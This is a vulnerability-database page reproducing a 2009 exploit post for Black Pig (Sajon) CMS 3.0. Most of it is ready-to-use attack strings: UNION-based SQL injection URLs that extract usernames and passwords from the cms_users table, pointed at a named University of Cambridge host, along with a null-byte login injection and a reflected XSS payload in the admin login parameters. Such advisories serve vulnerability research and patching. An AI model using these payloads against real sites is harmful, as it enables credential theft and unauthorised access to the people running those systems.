Lucene search
K

Black Pig CMS 3.0 XSS / SQL Injection

🗓️ 26 Aug 2009 00:00:00Reported by Inj3ct0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Security flaws in Black Pig CMS 3.0 include SQL Injection and Cross-Site Scripting vulnerabilities.

Code
`=============================================  
Black Pig (Sajon) CMS 3.0 SQL Injection + XSS  
=============================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net  
  
  
Product : Black Pig (Sajon) CMS 3.0  
site: http://www.blackpig.co.uk/  
  
  
Investigated the University of Cambridge. =]  
The file name may change, but is vulnerable parameter key  
  
1) SQL inj3ct0r  
  
Example:  
  
http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+username,2,password+from+cms_users--  
  
http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+version(),2,concat_ws(char(58),group_concat(username+separator+0x3a),group_concat(password+separator+0x3a))+from+cms_users--  
  
SQL inj in admin, when authorization  
  
Example:  
  
POST   
formloginuser=%00   
  
  
2) XSS   
  
http://www.site.com/cms/admin.php   
POST   
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>   
The same is true in goid,gopage   
  
  
Admin is:  
  
site.com/cms/   
  
Disclosure ways:  
  
http://www.site.com/cms/admin.php   
  
  
in the login box set '  
  
Table: cms_users   
Fields: username,password   
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
# ~ - [ [ : Inj3ct0r : ] ]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation